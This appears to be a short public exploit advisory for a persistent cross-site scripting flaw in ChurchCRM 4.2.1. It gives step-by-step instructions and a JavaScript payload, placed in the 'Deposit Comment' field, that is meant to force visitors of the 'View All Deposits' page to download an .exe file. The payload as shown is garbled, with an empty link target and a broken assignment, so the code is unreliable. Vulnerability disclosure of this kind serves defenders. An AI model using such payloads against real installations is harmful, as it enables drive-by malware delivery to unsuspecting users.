ChurchCRM 4.2.1 Cross Site Scripting

ChurchCRM version 4.2.1 suffers from a persistent cross site scripting vulnerability.

MD5 | 6b89f16ad8ec880867569b93690fe6bc

#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
#Date: 2020- 10- 29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage:
#Software Link:
#Version: 4.2.1
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:

1. Login to the application, go to 'View all Deposits' module.
2. Add the payload ( <script>var link = document.createElement('a');
link.href = ''; = ''; document.body.appendChild(link);;
) in the 'Deposit Comment' field and click "Add New Deposit".
3. Payload is executed and a .exe file is downloaded.

Related Posts